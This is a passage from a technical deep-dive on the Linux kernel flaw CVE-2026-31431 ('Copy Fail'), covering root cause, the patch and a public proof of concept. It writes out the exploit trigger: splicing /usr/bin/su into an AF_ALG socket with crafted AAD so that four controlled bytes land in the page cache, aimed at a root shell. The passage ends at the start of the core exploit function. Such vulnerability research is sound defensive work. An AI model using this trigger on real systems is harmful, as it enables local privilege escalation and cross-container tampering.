Copy Fail Deep Dive (CVE-2026-31431): Root Cause, Exploitation, and Detection of a Linux Page Cache Vulnerability

1. Introduction

In late April 2026, security researcher Taeyang Lee publicly disclosed a Linux kernel vulnerability assigned CVE-2026-31431 and gave it an ironic name: Copy Fail.

The name captures the essence of the bug. In 2017, a kernel developer fixed an AF_ALG crypto-interface bug where AAD was not copied from src to dst. The fix introduced an in-place optimization. The optimization was reasonable by itself, but it unintentionally broke a long-standing implicit assumption in another module of the kernel crypto subsystem, authencesn: the destination buffer is contiguous kernel memory, and writing a few bytes into it has no side effects.

When these two independent subsystems meet the Page Cache through splice(), an unprivileged local user can write four controlled bytes into the page cache of any readable file on the system.

This is not a conventional out-of-bounds write or use-after-free. Its impact is more subtle and more far-reaching:

  • Local privilege escalation: repeated writes can overwrite the ELF header of /usr/bin/su and lead to a root shell.
  • Zero-privilege cross-container attack: containers in different namespaces on the same host can share the page cache for image layers, allowing one container to corrupt binaries used by another container.
  • Read-only mount bypass: the target file only needs to be opened with O_RDONLY; a read-only volume no longer prevents page-cache modification.
  • Default security controls fail to stop it: the default Docker/Kubernetes seccomp profile and the SELinux targeted policy do not block exploitation.

The vulnerability affects mainstream Linux distribution kernels released between 2017 and 2026 and remained latent for almost nine years. It is rated CVSS 7.8 High.

Timeline

Date        Event
2011        The authencesn module was introduced. The ESN scratch write was harmless in its original usage.
2015        AF_ALG gained AEAD and splice support, but still used an out-of-place design.
2017-07     Commit 72548b093ee3 introduced the in-place optimization and created the vulnerable behavior.
2026-03-23  The bug was reported to the Linux kernel security team.
2026-04-01  Patch a664bf3d603d was merged into mainline.
2026-04-22  CVE-2026-31431 was assigned.
2026-04-29  Public disclosure.
2026-05-01  CISA added the issue to the KEV catalog, with a remediation due date of 2026-05-15.
2026-05-04  Docker 29.4.2 changed the default seccomp behavior to block AF_ALG; RHEL 9 and 10 kernel fixes were released.
2026-05-06  Docker 29.4.3 fixed the 29.4.2 regression and switched to AppArmor/SELinux enforcement for AF_ALG; RHEL 8 fixes were released.
2026-05-07  Dirty Frag, affecting ESP/RxRPC subsystems with a similar primitive, was publicly disclosed.

This article starts with the background needed to understand the trigger path, then walks through root cause analysis, PoC behavior, and kernel-level dynamic validation. It then systematically explores host privilege-escalation paths and container attack scenarios, including their practical boundaries. The final sections cover mitigation and a page-cache integrity detection design based on O_DIRECT and fanotify.


2. Background

Understanding Copy Fail requires several kernel concepts. Their dependencies can be summarized as follows:

Scatterlist (SGL)    AEAD Crypto            Page Cache
     |                |       |                |
scatterwalk          AAD  authencesn        splice()
     |                |       |                |
     +--------+-------+       |                |
              |               |                |
          AF_ALG -------------+                |
              |                                |
          algif_aead --------------------------+

We will go through them one by one.

2.1 Page Cache: Linux's Global File Cache

When a process reads /usr/bin/cat through read(), the kernel does not fetch the data from disk every time. It first checks a memory area called the Page Cache. If the corresponding file page is already cached, the kernel returns the cached data directly.

Several Page Cache properties are directly relevant to this vulnerability:

Globally shared. The Page Cache is indexed by (inode, page_offset). It does not belong to any specific process. All processes on the same machine that access the same inode hit the same page-cache entry. After process A loads a file into the page cache through read(), process B reads the same file from cache without touching disk again.

Writeback semantics. For modifications made through the normal write() path, the kernel marks the page as dirty and later writes it back to disk through the writeback mechanism. If a kernel path bypasses the VFS layer and directly modifies a page-cache page, the dirty bit is not set. The modification only lives in memory and disappears after reboot or after the page is dropped from cache.

Immediate visibility. Once a page-cache page is modified, later read() calls immediately see the modified content, regardless of how that modification happened. This includes other processes on the same host and, in container environments, processes that share the same lower-layer inode through overlayfs. Section 6.1 covers that in detail.
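
The three properties above can be illustrated with a toy model. The sketch below is not kernel code: ToyPageCache, vfs_write, and raw_page_write are hypothetical names chosen for illustration, and the model assumes every access stays inside a single page.

```python
class ToyPageCache:
    """Toy model: pages are keyed by (inode, page_index) and shared by all readers."""
    PAGE_SIZE = 4096

    def __init__(self, disk):
        self.disk = disk      # inode -> bytes stored on "disk"
        self.pages = {}       # (inode, page_index) -> bytearray
        self.dirty = set()    # keys that writeback would eventually flush

    def _page(self, inode, index):
        key = (inode, index)
        if key not in self.pages:  # cache miss: load the page from disk
            start = index * self.PAGE_SIZE
            self.pages[key] = bytearray(self.disk[inode][start:start + self.PAGE_SIZE])
        return self.pages[key]

    def read(self, inode, offset, length):
        index, in_page = divmod(offset, self.PAGE_SIZE)
        return bytes(self._page(inode, index)[in_page:in_page + length])

    def vfs_write(self, inode, offset, data):
        # Normal write path: modify the page and mark it dirty.
        index, in_page = divmod(offset, self.PAGE_SIZE)
        self._page(inode, index)[in_page:in_page + len(data)] = data
        self.dirty.add((inode, index))

    def raw_page_write(self, inode, offset, data):
        # Models a kernel path that modifies the page without marking it dirty.
        index, in_page = divmod(offset, self.PAGE_SIZE)
        self._page(inode, index)[in_page:in_page + len(data)] = data

    def drop_caches(self):
        # Only clean pages are evicted; writeback of dirty pages is not modeled.
        for key in [k for k in self.pages if k not in self.dirty]:
            del self.pages[key]


cache = ToyPageCache({1: b"original file content"})
before = cache.read(1, 0, 8)
cache.raw_page_write(1, 0, b"EVIL")
seen_by_other_reader = cache.read(1, 0, 8)   # every reader sees the change
cache.drop_caches()
after_drop = cache.read(1, 0, 8)             # reloaded from disk, change is gone
```

In this model the raw write is visible to every later reader, never reaches the disk, and vanishes once the clean page is evicted, which matches the behavior described for writes that bypass the VFS layer.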

[Figure: Page Cache architecture]

2.2 Scatterlist: Scatter-Gather Lists

Inside the kernel, logically contiguous data, such as a 10 KB encryption payload, is often stored across multiple non-contiguous physical 4 KB pages. To describe which pages and offsets make up that logical data range, the kernel uses scatterlists (SGLs).

Each struct scatterlist entry describes a contiguous physical memory range:

struct scatterlist {
    unsigned long   page_link;  // pointer to struct page, or CHAIN to another SGL array
    unsigned int    offset;     // starting offset inside the page
    unsigned int    length;     // data length
};

When a single SGL array is not enough, multiple arrays can be connected through SG_CHAIN. The final entry no longer points to a data page; instead, its page_link points to the start of another SGL array. The scatterwalk iterator hides this linked structure from callers.

The design is sound by itself. The problem appears when some entries in the SGL do not point to ordinary kernel-allocated memory but to pages in the page cache. A write to such an SGL entry is equivalent to directly modifying cached file content. That is the core exploitation point in Copy Fail.
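
To make the chained layout concrete, here is a minimal Python sketch of how a logical byte position is resolved to a backing page. Entry and resolve are hypothetical names; the real scatterwalk code works on struct page pointers and mapped kernel addresses, not bytearrays.

```python
from dataclasses import dataclass
from typing import Optional


@dataclass
class Entry:
    page: Optional[bytearray] = None   # backing memory of a data entry
    offset: int = 0                    # starting offset inside the page
    length: int = 0                    # data length
    chain: Optional[list] = None       # set instead of page for a chain entry


def resolve(sgl, pos):
    """Map a logical byte position to (backing page, offset inside that page)."""
    for entry in sgl:
        if entry.chain is not None:        # follow the link to the next array
            return resolve(entry.chain, pos)
        if pos < entry.length:
            return entry.page, entry.offset + pos
        pos -= entry.length
    raise IndexError("position beyond the end of the scatterlist")


rx = bytearray(8)                          # ordinary buffer
file_page = bytearray(b"FILEDATA")         # stands in for a page-cache page
tail = [Entry(page=file_page, offset=0, length=4)]
sgl = [Entry(page=rx, offset=0, length=8), Entry(chain=tail)]

page, off = resolve(sgl, 8)                # first byte after the ordinary buffer
```

The caller only supplies a logical offset. Whether that offset lands in an ordinary buffer or in a shared page depends entirely on how the list was assembled.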

[Figure: Scatterlist layout]

2.3 splice: The Cost of Zero Copy

splice() is a high-performance Linux data-transfer system call. Its main idea is to avoid copying data back and forth between kernel space and user space. Instead, it moves page references between kernel pipe buffers.

A normal read() plus write() flow copies file data into a user-space buffer and then copies it back into the kernel for the destination. splice() directly transfers references to the file's page-cache pages to the other side of a pipe, without copying the data itself.
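
As a benign illustration of the API, the following sketch copies a file through a pipe. It assumes Linux and Python 3.10 or later for os.splice, and falls back to an ordinary read()/write() loop elsewhere; copy_through_pipe is a hypothetical helper name.

```python
import os
import tempfile


def copy_through_pipe(src_path, dst_path, chunk=4096):
    """Copy a file through a pipe, using splice() when the platform provides it."""
    have_splice = hasattr(os, "splice")    # Linux, Python 3.10+
    src = os.open(src_path, os.O_RDONLY)
    dst = os.open(dst_path, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
    pipe_r, pipe_w = os.pipe()
    copied = 0
    try:
        while True:
            if have_splice:
                n = os.splice(src, pipe_w, chunk)          # file -> pipe, no user buffer
            else:
                n = os.write(pipe_w, os.read(src, chunk))  # fallback: user-space copy
            if n == 0:
                break
            left = n
            while left:
                if have_splice:
                    left -= os.splice(pipe_r, dst, left)   # pipe -> file
                else:
                    left -= os.write(dst, os.read(pipe_r, left))
            copied += n
    finally:
        for fd in (src, dst, pipe_r, pipe_w):
            os.close(fd)
    return copied


with tempfile.TemporaryDirectory() as tmp:
    src_path = os.path.join(tmp, "src.bin")
    dst_path = os.path.join(tmp, "dst.bin")
    payload = os.urandom(10000)
    with open(src_path, "wb") as f:
        f.write(payload)
    copied = copy_through_pipe(src_path, dst_path)
    with open(dst_path, "rb") as f:
        round_trip = f.read()
```

On the splice path the data never passes through a Python bytes object; only the byte counts come back to user space.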

[Figure: splice zero-copy comparison]

In the AF_ALG crypto interface, splice() can feed file content directly into a crypto algorithm. The file's page-cache pages are placed directly into the TX SGL. The page_link fields in those SGL entries point to globally shared page-cache pages. This is the critical design decision: if any later code path writes to that SGL, it writes to the file's page cache.

2.4 AF_ALG: User-Space Crypto Interface

The Linux kernel exposes a crypto API to user space through AF_ALG (Address Family: Algorithm). The API is socket-based:

import socket, os

AF_ALG = 38
SOL_ALG = 279

# 1. Create an AF_ALG socket and choose the crypto algorithm.
alg_sock = socket.socket(AF_ALG, socket.SOCK_SEQPACKET, 0)
# Bind the algorithm name, for example an AEAD algorithm such as gcm(aes).
alg_sock.bind(("aead", "gcm(aes)"))
alg_sock.setsockopt(SOL_ALG, 1, key_bytes)    # ALG_SET_KEY = 1
alg_sock.setsockopt(SOL_ALG, 5, None, 16)     # ALG_SET_AEAD_AUTHSIZE = 5 (4 is ALG_SET_AEAD_ASSOCLEN)

# 2. accept() returns an operation socket.
op_sock = alg_sock.accept()[0]

# 3. sendmsg() sends data to be encrypted or decrypted.
# Control messages specify operation type, IV, AAD length, and other parameters.
op_sock.sendmsg([plaintext_data], control_messages)

# 4. recv() receives the result. The kernel performs the actual crypto operation here.
result = op_sock.recv(output_buffer_size)
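
The control_messages argument above is left abstract. As a sketch, the ancillary data for an AEAD request could be built as follows. The numeric constants are the values defined in the kernel's linux/if_alg.h; build_aead_cmsgs is a hypothetical helper name, and native byte order is assumed for the 32-bit fields.

```python
import struct

SOL_ALG = 279
ALG_SET_KEY = 1
ALG_SET_IV = 2
ALG_SET_OP = 3
ALG_SET_AEAD_ASSOCLEN = 4
ALG_SET_AEAD_AUTHSIZE = 5
ALG_OP_DECRYPT = 0
ALG_OP_ENCRYPT = 1


def build_aead_cmsgs(op, iv, assoclen):
    """Return the ancillary-data list accepted by socket.sendmsg()."""
    return [
        (SOL_ALG, ALG_SET_OP, struct.pack("I", op)),                  # operation type
        (SOL_ALG, ALG_SET_IV, struct.pack("I", len(iv)) + iv),        # struct af_alg_iv
        (SOL_ALG, ALG_SET_AEAD_ASSOCLEN, struct.pack("I", assoclen)), # AAD length
    ]


# Example: encrypt with gcm(aes), a 12-byte IV, and 16 bytes of AAD.
control_messages = build_aead_cmsgs(ALG_OP_ENCRYPT, bytes(12), 16)
```

Naming the constants instead of passing bare integers makes it much harder to confuse ALG_SET_IV, ALG_SET_OP, and the two AEAD length options.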

AF_ALG also supports feeding file content to a crypto algorithm through splice(), avoiding copies between kernel space and user space. This feature is essential to the Copy Fail exploit chain: the data that enters through splice is stored in the TX SGL as page-cache page references, not as copied bytes.

In the kernel, algif_aead.c handles AEAD requests. It manages the TX SGL, which contains data sent by the user, and the RX SGL, which points to the user's receive buffer. It eventually calls a lower-level crypto algorithm, such as authencesn, to perform the actual encryption or decryption.

2.5 AEAD and authencesn's Scratch Write

AEAD stands for Authenticated Encryption with Associated Data. It provides confidentiality and integrity at the same time. On the decryption path, which is the one Copy Fail uses, its data format is:

Input:   AAD (Associated Data) || Ciphertext || Auth Tag
Output:  AAD || Plaintext

AAD is associated data that is not encrypted but is authenticated. Ciphertext is the encrypted data, and Auth Tag is the authentication tag.
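
The way a decryption request is carved up depends only on two lengths. A minimal sketch, where split_decrypt_input is a hypothetical helper rather than a kernel function:

```python
def split_decrypt_input(buf, assoclen, authsize):
    """Split AAD || Ciphertext || Auth Tag using only the two length parameters."""
    if assoclen + authsize > len(buf):
        raise ValueError("input shorter than assoclen + authsize")
    tag_start = len(buf) - authsize
    aad = buf[:assoclen]
    ciphertext = buf[assoclen:tag_start]
    tag = buf[tag_start:]
    return aad, ciphertext, tag


aad, ciphertext, tag = split_decrypt_input(b"AAAAAAAA" + b"cipher" + b"TAG!", 8, 4)
```

The AEAD layer attaches no meaning to the bytes themselves: whatever occupies the last authsize bytes of the input is treated as the tag.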

authencesn is an AEAD implementation in the Linux kernel. Its full name is "authenc with Extended Sequence Number". It was designed for IPsec ESN.

What AAD means

In AEAD, AAD is additional data that must be authenticated but does not need to be encrypted. In TLS, AAD can be the record header: content type, protocol version, and length. In IPsec, AAD includes the security parameter index and sequence number. The concrete content varies by protocol, but the AEAD layer only needs to know that the first assoclen bytes are AAD.

Why authencesn writes into the dst buffer

The ESN protocol uses a 64-bit sequence number to prevent wraparound attacks. Only the low 32 bits are transmitted on the wire; the high 32 bits are maintained locally by the peers. authencesn needs the full 64-bit sequence number during HMAC computation. It handles this as follows:

  1. Put the high 32 bits of the sequence number in AAD[4:8].
  2. Before calculating HMAC, temporarily write AAD[4:8] into the place in the destination buffer where the auth tag normally resides, so the HMAC covers the full sequence number.
  3. Restore state after HMAC calculation.

This temporary write is the ESN scratch write:

// crypto/authencesn.c - crypto_authenc_esn_decrypt()

// Read the first eight bytes from AAD.
scatterwalk_map_and_copy(tmp, req->dst, 0, 8, 0);
// In the IPsec case: tmp[0] = SPI, tmp[1] = SeqNo_Hi

unsigned int cryptlen = req->cryptlen;
cryptlen -= authsize;  // locate the beginning of the auth-tag area

// Temporarily write AAD[4:8] into the tag area in dst for HMAC calculation.
scatterwalk_map_and_copy(tmp + 1, req->dst, assoclen + cryptlen, 4, 1);
//                       ^^^^^^^^                                ^
//                    AAD[4:8]                               4 bytes, 1 = write

The write size is hard-coded to four bytes (sizeof(u32)), and the value comes from AAD[4:8].
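
To make the AAD layout concrete, the sketch below splits a 64-bit ESN into its two halves and packs an IPsec-style AAD. It assumes the layout SPI || SeqNo_Hi || SeqNo_Lo in network byte order, consistent with tmp[0] = SPI and tmp[1] = SeqNo_Hi above; esn_split and esn_aad are hypothetical helper names.

```python
import struct


def esn_split(seq64):
    """Return (high 32 bits, low 32 bits) of a 64-bit extended sequence number."""
    return (seq64 >> 32) & 0xFFFFFFFF, seq64 & 0xFFFFFFFF


def esn_aad(spi, seq64):
    """Pack SPI || SeqNo_Hi || SeqNo_Lo as big-endian 32-bit words (assumed layout)."""
    hi, lo = esn_split(seq64)
    return struct.pack(">III", spi, hi, lo)


aad = esn_aad(0x1000, 0x0000000100000002)
seq_hi_bytes = aad[4:8]   # the four bytes that the scratch write moves
```

Here seq_hi_bytes is the big-endian encoding of the high half of the sequence number, the same AAD[4:8] slice that the scratch write copies into dst.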

In normal IPsec usage, req->dst points to a contiguous buffer allocated by the kernel with kmalloc, and AAD[4:8] is legitimate sequence-number data. The temporary write and restoration are harmless.

The attack surface opened by AF_ALG

Through AF_ALG, however, user space can directly invoke the authencesn algorithm and fully control the AAD content. authencesn does not validate whether AAD[4:8] is a real ESN sequence number. It simply writes these four bytes into a fixed offset of dst.

If the attacker places the desired page-cache bytes in AAD[4:8], authencesn faithfully writes them to a fixed offset of dst.

The obvious question is: what if req->dst does not contain a kmalloc buffer, but page-cache pages?


3. Root Cause Analysis

3.1 How the Vulnerability Was Introduced: A Reasonable Optimization

In July 2017, kernel developer Stephan Mueller submitted commit 72548b093ee3, titled "crypto: algif_aead - copy AAD from src to dst".

The commit fixed a real bug. Before this change, the algif_aead decryption path used an out-of-place mode:

// Before 2017: out-of-place
aead_request_set_crypt(&areq->aead_req,
                       areq->tsgl,              // req->src = TX SGL (input data)
                       areq->first_rsgl.sgl.sg, // req->dst = RX SGL (user receive buffer)
                       used, ctx->iv);

The TX SGL contained all data sent through sendmsg() and splice(): AAD, ciphertext, and authentication tag. The RX SGL pointed to the user-space receive buffer. The AEAD specification requires the decrypted output to include AAD, but lower-level algorithms only process the ciphertext. The caller must copy AAD from src to dst. The old algif_aead code did not do that, so the AAD area in the user's output was zeroed.

Commit 72548b093ee3 fixed this in three steps:

  1. Copy AAD and ciphertext from TX SGL to the RX buffer using memcpy_sglist, so AAD appears in the output.
  2. Chain the TX SGL pages that contain the auth tag to the tail of the RX SGL through sg_chain(), because AEAD decryption still needs the tag for authentication, even though the tag is not part of the output.
  3. Set req->src = req->dst = RX SGL, where the RX SGL now contains AAD, ciphertext, and the chained tag pages.

// Vulnerable code after 2017: in-place
// Step 1: copy AAD + ciphertext into the RX buffer
memcpy_sglist(rsgl, tsgl_src, outlen);  // outlen = assoclen + cryptlen - authsize

// Step 2: pull tag pages from the TX SGL
af_alg_pull_tsgl(sk, processed, areq->tsgl, processed - as);
// Step 3: chain them to the tail of the RX SGL
sg_chain(rsgl_sg, rsgl_nents, areq->tsgl);

// Step 4: in-place, src and dst both point to the combined RX SGL
aead_request_set_crypt(&areq->aead_req,
                       rsgl_src,   // req->src = RX SGL, including chained tag pages
                       rsgl_dst,   // req->dst = RX SGL, the same object
                       used, ctx->iv);

Functionally, this solved the AAD copy bug. The problem is in the tag pages pulled in Step 2. They come from the TX SGL, and data that entered the TX SGL through splice() directly references file page-cache pages. These page-cache pages are now chained into req->dst.
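
The difference between copying data and chaining a reference can be shown with plain Python buffers. This is only an analogy: file_page stands in for a page-cache page, and a memoryview slice stands in for a chained SGL entry.

```python
file_page = bytearray(b"0123456789ABCDEF")   # stands in for a page-cache page
t = 8

# Copy semantics (memcpy_sglist): the receive buffer holds private bytes.
rx_copy = bytearray(file_page[:t])
rx_copy[0:4] = b"XXXX"                       # does not touch file_page

# Reference semantics (chained tag entry): the view aliases the original page.
tag_ref = memoryview(file_page)[t:t + 4]
tag_ref[:] = b"YYYY"                         # modifies file_page in place
```

After these writes, file_page[0:4] is unchanged but file_page[8:12] holds YYYY. Only the write through the reference reached the shared page.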

3.2 Conflicting Design Assumptions

The essence of the bug is an implicit assumption conflict between two subsystems:

Subsystem                       Assumption
authencesn (2011)               req->dst is a contiguous kmalloc buffer, so a scratch write has no side effects.
algif_aead optimization (2017)  The tail of req->dst may contain page-cache pages chained from the TX SGL.

In every other authencesn call path, mainly IPsec/xfrm, dst is indeed a kernel-allocated contiguous buffer. The algif_aead in-place optimization was the first, and effectively the only, path that could place page-cache pages inside the req->dst SGL.

3.3 Complete Trigger Path

[Figure: Complete Copy Fail trigger path]

Now let us walk through the whole trigger sequence. Assume the goal is to write four controlled bytes at offset t in a target file.

Step 1: user space sends data

The exploit uses the following parameters:

  • assoclen = 8, specified through the control message passed to sendmsg.
  • authsize = 4, set through setsockopt(ALG_SET_AEAD_AUTHSIZE).

Then data is sent to the AF_ALG socket in two stages:

# Four bytes to write.
evil_bytes = b'\xde\xad\xbe\xef'

# Stage 1: send eight bytes of AAD through sendmsg.
# AAD[0:4] = arbitrary padding, AAD[4:8] = bytes to write to the page cache.
# authencesn will treat AAD[4:8] as ESN seqno_hi and write it to the scratch area.
aad = b'\x00\x00\x00\x00' + evil_bytes   # 8 bytes
op.sendmsg([aad], cmsg, socket.MSG_MORE)  # MSG_MORE means more data follows.

# Stage 2: splice the first t + 4 bytes of the target file into the AF_ALG socket.
# splice passes page-cache page references without copying data.
pipe_r, pipe_w = os.pipe()
target_fd = os.open("/usr/bin/su", os.O_RDONLY)
os.splice(target_fd, pipe_w, t + 4, offset_src=0)  # file -> pipe
os.splice(pipe_r, op.fileno(), t + 4)              # pipe -> AF_ALG socket

Step 2: TX SGL layout

After the two sends, the kernel's TX SGL contains:

TX SGL:
+--------------------+----------------------------------------+
| sendmsg data (8B)  | splice data (t+4 bytes)                |
| AAD: 4 zero bytes  | file[0:t+4]                            |
|      + evil_bytes  | page-cache page refs via splice        |
|  (kmalloc memory)  | (points to GLOBAL SHARED page cache)   |
+--------------------+----------------------------------------+

From AEAD decryption's point of view, this data is interpreted as:

  • AAD = the first assoclen=8 bytes = four zero bytes plus evil_bytes from sendmsg.
  • Ciphertext = the middle t bytes = file[0:t].
  • Auth Tag = the final authsize=4 bytes = file[t:t+4].

Total byte count is 8 + t + 4 = t + 12.

Step 3: recv triggers decryption and in-place SGL construction

Calling recv() triggers _aead_recvmsg(). The vulnerable code does the following:

outlen = assoclen + (cryptlen - authsize) = 8 + ((t+4) - 4) = t + 8

(1) memcpy_sglist(RX buffer, TX SGL, outlen=t+8):
    Copy first t+8 bytes of TX SGL to the RX buffer (user-space allocated memory).
    RX buffer contents:
      [0:8]   = copy of AAD (sendmsg data)
      [8:8+t] = copy of file[0:t] (ciphertext portion)
    Note: this is a DATA COPY, not a page reference.

(2) af_alg_pull_tsgl(TX SGL, skip=t+8, take=4):
    Skip the first t+8 bytes of TX SGL and extract the final 4 bytes (tag region).
    These four bytes correspond to file[t:t+4] from splice.
    -> SGL entry: { page = file's page-cache page, offset = t % 4096, length = 4 }
    -> This is the ORIGINAL page-cache reference, not a copy.

(3) sg_chain(RX SGL tail, tag SGL):
    Chain the tag page reference to the end of RX SGL.

The final combined destination SGL, which is also the source SGL, looks like this:

combined dst SGL (= req->src = req->dst):

+-- RX buffer (user-space, safe) ---+  +-- chained tag (PAGE CACHE) ------+
|                                  |  |                                  |
| AAD (8B) | ciphertext (tB)       |->| file[t:t+4] in page cache        |
|          | = copy of file[0:t]   |  | original page ref from splice    |
|                                  |  |                                  |
+-- offset 0              t+8 -----+  +-- offset t+8              t+12 --+

The key point is that the RX-buffer portion is ordinary user-space memory, which is safe to write, but the chained tag pages at the tail are original page-cache references from the file.
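
The in-page offset t % 4096 of the tag entry can be computed as below. The sketch assumes 4 KB pages; locate_tag is a hypothetical helper, and the straddling flag only reports that a four-byte region would need more than one SGL entry, a case the walkthrough above does not cover.

```python
PAGE_SIZE = 4096


def locate_tag(t, length=4):
    """Return (page index, offset inside the page, whether the region crosses a page)."""
    first_page, in_page = divmod(t, PAGE_SIZE)
    last_page = (t + length - 1) // PAGE_SIZE
    return first_page, in_page, last_page != first_page


example_start = locate_tag(0)
example_later_page = locate_tag(2 * PAGE_SIZE + 10)
example_boundary = locate_tag(PAGE_SIZE - 2)
```

For t = 0 this reproduces the entry with offset=0 and length=4 that appears in the GDB output in Section 4.3.3.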

Step 4: authencesn scratch write hits the page cache

crypto_authenc_esn_decrypt() starts running. The destination offset for the ESN scratch write is computed as follows:

// scratch write in crypto_authenc_esn_decrypt()

// First read AAD[0:8].
scatterwalk_map_and_copy(tmp, req->dst, 0, 8, 0);  // tmp[0]=AAD[0:4], tmp[1]=AAD[4:8]

unsigned int cryptlen = req->cryptlen;  // = t + 4, ciphertext plus tag
cryptlen -= authsize;                   // = t + 4 - 4 = t

// Write tmp[1] (= AAD[4:8] = evil_bytes) into dst[assoclen + cryptlen].
scatterwalk_map_and_copy(tmp + 1, req->dst, assoclen + cryptlen, 4, 1);
//                       ^^^^^^^^                  ^^^^^^^^^^^^^^^^  ^
//                    = AAD[4:8]                   = 8 + t          write direction
//                    = evil_bytes

The write position is offset 8 + t in the destination SGL. Comparing that with the combined SGL layout above:

  • The RX-buffer portion occupies [0, t+8), for a total of t+8 bytes.
  • The chained tag pages start at offset t+8.

Therefore, 8 + t is exactly the boundary of the RX buffer and the start of the chained tag pages.

Those tag pages are original page-cache references to file[t:t+4]. The scratch write therefore writes four bytes to offset t of the file's page cache.

The written value is tmp[1] = AAD[4:8] = evil_bytes, supplied through sendmsg.

At this point the chain is complete: the write offset is controlled by the splice() length, which determines t, and the write content is controlled by AAD[4:8] from sendmsg. Both are freely controlled from user space.
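
The arithmetic behind this alignment is short enough to check mechanically. The sketch below restates the formulas from this section with assoclen = 8 and authsize = 4; trigger_layout is a hypothetical helper that performs only integer arithmetic.

```python
ASSOCLEN = 8   # AAD bytes sent through sendmsg
AUTHSIZE = 4   # tag length set through ALG_SET_AEAD_AUTHSIZE


def trigger_layout(t):
    """Return the byte offsets from this section for a target file offset t."""
    splice_len = t + AUTHSIZE                     # file[0 : t+4]
    cryptlen = splice_len                         # req->cryptlen: ciphertext plus tag
    rx_len = ASSOCLEN + cryptlen - AUTHSIZE       # outlen copied into the RX buffer
    scratch = ASSOCLEN + (cryptlen - AUTHSIZE)    # dst offset of the scratch write
    return {
        "total_tx_bytes": ASSOCLEN + splice_len,
        "rx_len": rx_len,
        "scratch_offset": scratch,
        "file_offset": t + (scratch - rx_len),    # tag region starts at file offset t
    }


for t in (0, 8, 4096):
    info = trigger_layout(t)
    # The scratch write always lands on the first byte after the RX buffer.
    assert info["scratch_offset"] == info["rx_len"]
```

Because rx_len and scratch_offset are the same expression, the alignment holds for every t. It is a structural property of the in-place layout, not a coincidence of particular parameters.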

Why the write is not undone

After decryption, crypto_authenc_esn_decrypt_tail() attempts to restore data overwritten by the scratch write. The critical detail is that it first reads the current value at dst[8+t], which is already the payload, and then writes AAD back to dst[0:8]. It never writes the original value back to dst[8+t].

The HMAC verification will fail because the data has been modified, and recvmsg returns -EBADMSG. But the page-cache write has already happened and is not rolled back. An exploit simply ignores this error.
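
The sequence of writes can be replayed on a flat byte buffer. This is a simplified model under stated assumptions: dst is a single bytearray rather than an SGL, no HMAC is computed, and the order of operations follows the three writes visible in the GDB trace in Section 4.3.3 (dst[4:8], dst[assoclen + cryptlen], then dst[0:8]). esn_decrypt_model is a hypothetical name.

```python
def esn_decrypt_model(dst, assoclen, cryptlen_with_tag, authsize):
    """Replay the header shuffling around the HMAC step on a flat buffer."""
    cryptlen = cryptlen_with_tag - authsize
    tail = assoclen + cryptlen                  # start of the tag area

    # Before the HMAC: read AAD[0:8], then perform the two writes.
    tmp0, tmp1 = bytes(dst[0:4]), bytes(dst[4:8])
    dst[4:8] = tmp0                             # AAD[0:4] moved to dst[4:8]
    dst[tail:tail + 4] = tmp1                   # scratch write of AAD[4:8]

    # ... the HMAC would be computed here and fail with -EBADMSG ...

    # Tail: read both words back and rewrite only dst[0:8].
    tmp0, tmp1 = bytes(dst[4:8]), bytes(dst[tail:tail + 4])
    dst[0:4], dst[4:8] = tmp0, tmp1
    return dst


original = bytearray(b"AAAA" + b"\xde\xad\xbe\xef" + b"cipher" + b"TAG!")
result = esn_decrypt_model(bytearray(original), assoclen=8,
                           cryptlen_with_tag=10, authsize=4)
```

In the model, the first eight bytes end up identical to the original AAD, while the tag area keeps the scratch value. Nothing ever saved the bytes that were there before.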

3.4 Control Analysis

Write offset. The attacker controls t by adjusting the splice() length, which is t + authsize = t + 4. Each invocation can target an arbitrary file offset.

Write value. The attacker fully controls AAD[4:8], sent through sendmsg.

Write size. The write size is fixed at four bytes. It is not controlled by setsockopt(ALG_SET_AEAD_AUTHSIZE). authsize only affects the offset calculation through cryptlen -= authsize. The four-byte size is hard-coded in authencesn as sizeof(u32), the size of the high 32 bits of the ESN sequence number. A single call cannot change the size, but repeated calls can overwrite a contiguous file range.

Target file. Any file the current user can read is a target. The PoC opens the file with O_RDONLY. No write permission is required because the write path bypasses VFS permission checks.

Summary:

Write target: file page cache[t : t+4]
Write value:  AAD[4:8] sent through sendmsg (4 bytes, fully controlled)
Write size:   fixed 4 bytes (u32 hard-coded in authencesn)
Trigger:      assoclen=8, authsize=4, splice length=t+4
Permission:   O_RDONLY is enough; no write permission required
Root cause:   chained tag pages at the tail of dst SGL are original page-cache references from splice

3.5 Patch Analysis

The fix, commit a664bf3d603d, states:

This mostly reverts commit 72548b093ee3 except for the copying of the associated data. There is no benefit in operating in-place in algif_aead since the source and destination come from different mappings.

The fix removes in-place mode and makes req->src and req->dst point to different SGLs again:

// After the fix: out-of-place
// src = TX SGL, which may contain page-cache pages, but is read-only
// dst = RX SGL, a pure user-space buffer
aead_request_set_crypt(&areq->aead_req,
                       tsgl_src,   // req->src = TX SGL
                       rsgl_dst,   // req->dst = RX SGL, independent
                       used, ctx->iv);

// AAD is explicitly copied into the RX buffer.
memcpy_sglist(rsgl_dst, tsgl_src, ctx->aead_assoclen);

After the fix, req->dst only contains the user's RX buffer. It no longer contains page-cache pages. The authencesn scratch write lands in the user's receive buffer and has no security impact.

The patch removes roughly 92 lines of code: tag-page chaining, the in-place branch, the offset parameter added to af_alg_pull_tsgl, and other complexity needed only for in-place operation. The sg_chain() call is eliminated completely, so page-cache pages no longer have a path into req->dst.


4. PoC Analysis and Dynamic Validation

4.1 Public PoC Structure

The public Copy Fail PoC is a heavily obfuscated 732-byte Python script. It nests the real exploit code through base64 and zlib compression. After deobfuscation, the core is a function named page_cache_write_4bytes(fd, offset, value), which executes the trigger path described above and writes four bytes to the page cache of the file represented by fd.

The full PoC flow is:

  1. Open /usr/bin/su, a SUID-root binary, as read-only.
  2. Repeatedly call page_cache_write_4bytes() to overwrite the first 160 bytes of /usr/bin/su's ELF header with a carefully constructed ELF payload containing shellcode for a root shell.
  3. Execute the modified /usr/bin/su and obtain a root shell.

One important detail is that the PoC opens the target with O_RDONLY. Normal VFS writes through a read-only file descriptor would be rejected by the kernel. Copy Fail does not use the VFS write path; it writes to page-cache pages through the crypto subsystem's scratch write. Therefore any readable file is a potential target, including files mounted read-only.

4.2 Core Function

The deobfuscated core function, aligned with the data flow in Section 3, is:

import os
import socket
import struct

AF_ALG = 38
SOL_ALG = 279
ASSOCLEN = 8    # AAD length
AUTHSIZE = 4    # auth-tag size; also affects offset calculation

def page_cache_write_4bytes(fd, offset, value):
